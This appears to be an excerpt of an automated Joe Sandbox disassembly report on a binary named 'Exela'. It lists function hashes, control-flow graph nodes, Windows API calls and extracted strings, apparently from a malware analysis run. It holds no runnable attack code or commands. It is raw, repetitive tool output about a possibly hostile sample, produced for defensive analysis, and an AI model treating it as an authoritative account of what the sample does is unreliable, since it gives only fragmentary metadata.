                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                                                            • Opcode ID: 78a596c3fa58e1639bb55da3f19baf57d77ac2c1d59396bde79ba427dad7be7c
                                                                                                                                                                                                                                                            • Instruction ID: 91e1c62a41746bdf04759f0c7e41b8f3efae5d7d3b446163c386f6345faaca91
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78a596c3fa58e1639bb55da3f19baf57d77ac2c1d59396bde79ba427dad7be7c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B951F123B1868281EA249B1DE4423BA7F91FB80794F440135DE4EE77D5EE3EE484C74A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6E3A7FB4A,?,?,-00000018,00007FF6E3A7B8F7,?,?,?,00007FF6E3A7B7EE,?,?,?,00007FF6E3A76A32), ref: 00007FF6E3A7F92C
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6E3A7FB4A,?,?,-00000018,00007FF6E3A7B8F7,?,?,?,00007FF6E3A7B7EE,?,?,?,00007FF6E3A76A32), ref: 00007FF6E3A7F938
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                            • Opcode ID: 7d0b8cd1019d27a9e16eec9e317f5686f28e1310d53eba994d83145821214b12
                                                                                                                                                                                                                                                            • Instruction ID: 2f6ffcf44b5d88d1afe2a69c1515b6f4580b12538354d93b0594482ec9c841b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d0b8cd1019d27a9e16eec9e317f5686f28e1310d53eba994d83145821214b12
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC41F223B19A0281FA16DB1EA8413B52A95BF08B90F094135CD0DE77C8EF3EE5C5830A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 817 7ff6e3a7c5fc-7ff6e3a7c622 818 7ff6e3a7c63d-7ff6e3a7c641 817->818 819 7ff6e3a7c624-7ff6e3a7c638 call 7ff6e3a75a84 call 7ff6e3a75aa4 817->819 821 7ff6e3a7ca17-7ff6e3a7ca23 call 7ff6e3a75a84 call 7ff6e3a75aa4 818->821 822 7ff6e3a7c647-7ff6e3a7c64e 818->822 833 7ff6e3a7ca2e 819->833 841 7ff6e3a7ca29 call 7ff6e3a7b484 821->841 822->821 824 7ff6e3a7c654-7ff6e3a7c682 822->824 824->821 827 7ff6e3a7c688-7ff6e3a7c68f 824->827 830 7ff6e3a7c6a8-7ff6e3a7c6ab 827->830 831 7ff6e3a7c691-7ff6e3a7c6a3 call 7ff6e3a75a84 call 7ff6e3a75aa4 827->831 836 7ff6e3a7ca13-7ff6e3a7ca15 830->836 837 7ff6e3a7c6b1-7ff6e3a7c6b7 830->837 831->841 839 7ff6e3a7ca31-7ff6e3a7ca48 833->839 836->839 837->836 838 7ff6e3a7c6bd-7ff6e3a7c6c0 837->838 838->831 842 7ff6e3a7c6c2-7ff6e3a7c6e7 838->842 841->833 845 7ff6e3a7c71a-7ff6e3a7c721 842->845 846 7ff6e3a7c6e9-7ff6e3a7c6eb 842->846 850 7ff6e3a7c6f6-7ff6e3a7c70d call 7ff6e3a75a84 call 7ff6e3a75aa4 call 7ff6e3a7b484 845->850 851 7ff6e3a7c723-7ff6e3a7c74b call 7ff6e3a7e19c call 7ff6e3a7b4ec * 2 845->851 848 7ff6e3a7c6ed-7ff6e3a7c6f4 846->848 849 7ff6e3a7c712-7ff6e3a7c718 846->849 848->849 848->850 853 7ff6e3a7c798-7ff6e3a7c7af 849->853 882 7ff6e3a7c8a0 850->882 878 7ff6e3a7c74d-7ff6e3a7c763 call 7ff6e3a75aa4 call 7ff6e3a75a84 851->878 879 7ff6e3a7c768-7ff6e3a7c793 call 7ff6e3a7ce24 851->879 856 7ff6e3a7c82a-7ff6e3a7c834 call 7ff6e3a8456c 853->856 857 7ff6e3a7c7b1-7ff6e3a7c7b9 853->857 870 7ff6e3a7c83a-7ff6e3a7c84f 856->870 871 7ff6e3a7c8be 856->871 857->856 862 7ff6e3a7c7bb-7ff6e3a7c7bd 857->862 862->856 866 7ff6e3a7c7bf-7ff6e3a7c7d5 862->866 866->856 867 7ff6e3a7c7d7-7ff6e3a7c7e3 866->867 867->856 872 7ff6e3a7c7e5-7ff6e3a7c7e7 867->872 870->871 876 7ff6e3a7c851-7ff6e3a7c863 GetConsoleMode 870->876 874 7ff6e3a7c8c3-7ff6e3a7c8e3 ReadFile 871->874 872->856 877 7ff6e3a7c7e9-7ff6e3a7c801 872->877 880 7ff6e3a7c9dd-7ff6e3a7c9e6 GetLastError 874->880 881 7ff6e3a7c8e9-7ff6e3a7c8f1 874->881 876->871 883 7ff6e3a7c865-7ff6e3a7c86d 876->883 877->856 885 7ff6e3a7c803-7ff6e3a7c80f 877->885 878->882 879->853 890 7ff6e3a7c9e8-7ff6e3a7c9fe call 7ff6e3a75aa4 call 7ff6e3a75a84 880->890 891 7ff6e3a7ca03-7ff6e3a7ca06 880->891 881->880 887 7ff6e3a7c8f7 881->887 884 7ff6e3a7c8a3-7ff6e3a7c8ad call 7ff6e3a7b4ec 882->884 883->874 889 7ff6e3a7c86f-7ff6e3a7c891 ReadConsoleW 883->889 884->839 885->856 894 7ff6e3a7c811-7ff6e3a7c813 885->894 898 7ff6e3a7c8fe-7ff6e3a7c913 887->898 900 7ff6e3a7c893 GetLastError 889->900 901 7ff6e3a7c8b2-7ff6e3a7c8bc 889->901 890->882 895 7ff6e3a7ca0c-7ff6e3a7ca0e 891->895 896 7ff6e3a7c899-7ff6e3a7c89b call 7ff6e3a75a18 891->896 894->856 904 7ff6e3a7c815-7ff6e3a7c825 894->904 895->884 896->882 898->884 906 7ff6e3a7c915-7ff6e3a7c920 898->906 900->896 901->898 904->856 910 7ff6e3a7c947-7ff6e3a7c94f 906->910 911 7ff6e3a7c922-7ff6e3a7c93b call 7ff6e3a7c214 906->911 914 7ff6e3a7c9cb-7ff6e3a7c9d8 call 7ff6e3a7c054 910->914 915 7ff6e3a7c951-7ff6e3a7c963 910->915 919 7ff6e3a7c940-7ff6e3a7c942 911->919 914->919 916 7ff6e3a7c965 915->916 917 7ff6e3a7c9be-7ff6e3a7c9c6 915->917 920 7ff6e3a7c96a-7ff6e3a7c971 916->920 917->884 919->884 922 7ff6e3a7c9ad-7ff6e3a7c9b8 920->922 923 7ff6e3a7c973-7ff6e3a7c977 920->923 922->917 924 7ff6e3a7c979-7ff6e3a7c980 923->924 925 7ff6e3a7c993 923->925 924->925 926 7ff6e3a7c982-7ff6e3a7c986 924->926 927 7ff6e3a7c999-7ff6e3a7c9a9 925->927 926->925 928 7ff6e3a7c988-7ff6e3a7c991 926->928 927->920 929 7ff6e3a7c9ab 927->929 928->927 929->917
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 238f6c3964800fec6045ce986a1ebb87f5daa1cce848d40dd7ddd8ba0dfe7067
                                                                                                                                                                                                                                                            • Instruction ID: ddc74e6199d0400abd9c88994d0aa56e4a31fe643e92ce6b6bc33d206eb2c87f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 238f6c3964800fec6045ce986a1ebb87f5daa1cce848d40dd7ddd8ba0dfe7067
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04C1E123B0C68251E7609B1894863BE7F65EF80B80F150131DA4EA73D9DF7EE885C34A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                                                            • Opcode ID: b199e8e08dbafb2fefb291e728498370fa2251d2026f483e6f64b3b10aef1c42
                                                                                                                                                                                                                                                            • Instruction ID: 64a03823101554ee7366a28ff0923f5b2e65c5297a538f4e2f86edef92bc26c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b199e8e08dbafb2fefb291e728498370fa2251d2026f483e6f64b3b10aef1c42
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5216933B0864281D7109B5DE485239BBA5EF857A0F140235DA6D97AD4DF7DD4848B05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68650: GetCurrentProcess.KERNEL32 ref: 00007FF6E3A68670
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68650: OpenProcessToken.ADVAPI32 ref: 00007FF6E3A68681
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68650: GetTokenInformation.KERNELBASE ref: 00007FF6E3A686A6
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68650: GetLastError.KERNEL32 ref: 00007FF6E3A686B0
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68650: GetTokenInformation.KERNELBASE ref: 00007FF6E3A686F0
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68650: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6E3A6870C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68650: CloseHandle.KERNEL32 ref: 00007FF6E3A68724
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00007FF6E3A63B4E), ref: 00007FF6E3A689FC
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00007FF6E3A68A05
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                                                                                                                                            • API String ID: 6828938-1817031585
                                                                                                                                                                                                                                                            • Opcode ID: 4a0a64217b4c8618eeaa0cd08dc669878e89b812572458f449172cc44ebe3956
                                                                                                                                                                                                                                                            • Instruction ID: 25e1ac517281e0d161ea8ea2126965abeb0b4d6325cc2ae8805315b319b06a14
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a0a64217b4c8618eeaa0cd08dc669878e89b812572458f449172cc44ebe3956
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE216233B2868691F650AB1CE80A7F97A59AF54780F440131EA4DE3796DF3ED5808746
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E3A7DAEB), ref: 00007FF6E3A7DC1C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E3A7DAEB), ref: 00007FF6E3A7DCA7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                                                            • Opcode ID: 284863bd4a310ef6da540e9dcdc048057ff4d3a865a35ff47f01b15d00241537
                                                                                                                                                                                                                                                            • Instruction ID: cc24362538c1b8074109492598675818fb713f69be2fc818da12fb82e6c23032
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 284863bd4a310ef6da540e9dcdc048057ff4d3a865a35ff47f01b15d00241537
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D919263B0869195F7509F6D94863BD3FE0BB44B88F144139DA0EB66C9CE7AD4C1C70A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                                                            • Opcode ID: 20717f0f8a23f829e42a50c12fade424b7597f0ff0c8303254556571f0db49b3
                                                                                                                                                                                                                                                            • Instruction ID: 4f1640e2990db64f05bfedfa2b9ae8956f860a7a8932b1b39deba752dcc9ff1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20717f0f8a23f829e42a50c12fade424b7597f0ff0c8303254556571f0db49b3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18510673F042519AFB28DF6C999A7BC3B61BB50358F100235DE1DA2AE5DF3EA4818705
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                                                            • Opcode ID: c83329a2bd18a21367976a5c4af3d00e11dcc87eb128c326a6acb0b8d0e7847d
                                                                                                                                                                                                                                                            • Instruction ID: a8c76727d0affa5e5922a03d35cc7f15c58879e681b0394042736b0d32b8a287
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c83329a2bd18a21367976a5c4af3d00e11dcc87eb128c326a6acb0b8d0e7847d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D518E23F146418AFB14EF78D5923BD3BB1AB48B58F104135EE0DA7689DF39D482870A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                                                            • Opcode ID: 381f375d345d967458512f251a74178214fc3b76ffcff344aa252820e57b685e
                                                                                                                                                                                                                                                            • Instruction ID: 97c3ce348e13a9c13b40963debefc813bde32483da6187560ff053d82bc783e8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 381f375d345d967458512f251a74178214fc3b76ffcff344aa252820e57b685e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F741E223F1878283F754DB2495893A96B60FF94764F108334EA9C53ADAEF7DA4E08705
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                                                            • Opcode ID: 6002dbd076ae4a566e525ae88fd814f4055e3f1a47a00f0f8b84c6ff89a8b974
                                                                                                                                                                                                                                                            • Instruction ID: 7e00102f89bc069b5c3b280006a18c2519e043099248c1a4d5b19a720d234871
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6002dbd076ae4a566e525ae88fd814f4055e3f1a47a00f0f8b84c6ff89a8b974
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC313C23B2824355FA24BBAC94573B93A819F51784F445435E90FE72E7DE2EA4C4860B
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                            • Opcode ID: 4ba61a3cc0556e7c92b6fc1e72a638e9c9ea62dc27ce852986ab15971a897a88
                                                                                                                                                                                                                                                            • Instruction ID: 525fb7a1783129fa7d2a91f955024642ff836034a8f207b53b0374a1fc889311
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ba61a3cc0556e7c92b6fc1e72a638e9c9ea62dc27ce852986ab15971a897a88
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDD09E12B1868252EB143F7868DF27C5B616F48781F001438E85BB63D7CD3EA8CD474A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
